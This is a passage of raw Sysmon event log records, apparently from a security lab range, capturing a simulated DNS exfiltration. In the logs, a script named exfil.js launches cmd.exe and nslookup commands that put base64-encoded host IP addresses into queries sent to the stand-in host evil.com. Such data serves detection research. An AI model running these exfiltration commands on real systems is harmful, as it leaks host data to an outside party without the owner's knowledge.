10341000x8000000000000000201704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.309{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-FA40-000000005F02}7416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.309{2E1864BB-17C4-629A-F840-000000005F02}66522088C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-FA40-000000005F02}7416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.321{2E1864BB-17C4-629A-FA40-000000005F02}7416C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-F840-000000005F02}6652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnhjvr.tmp 2>&1 10341000x8000000000000000201701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.276{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-F940-000000005F02}1300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.276{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-F940-000000005F02}1300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.260{2E1864BB-17C4-629A-F940-000000005F02}13005064C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-F840-000000005F02}6652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.245{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F940-000000005F02}1300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.245{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.245{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.245{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.245{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.229{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F840-000000005F02}6652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.229{2E1864BB-17A1-629A-783D-000000005F02}55527380C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-F840-000000005F02}6652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.243{2E1864BB-17C4-629A-F840-000000005F02}6652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnhjvr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.229{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllflds.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-17C4-629A-F640-000000005F02}11443536C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-F740-000000005F02}4188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F740-000000005F02}4188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-17C4-629A-F540-000000005F02}33001476C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-F740-000000005F02}4188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.200{2E1864BB-17C4-629A-F740-000000005F02}4188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-F540-000000005F02}3300C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllflds.tmp 2>&1 10341000x8000000000000000201681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.176{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-F640-000000005F02}1144C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.176{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-F640-000000005F02}1144C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.176{2E1864BB-17C4-629A-F640-000000005F02}11443536C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-F540-000000005F02}3300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F640-000000005F02}1144C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F540-000000005F02}3300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 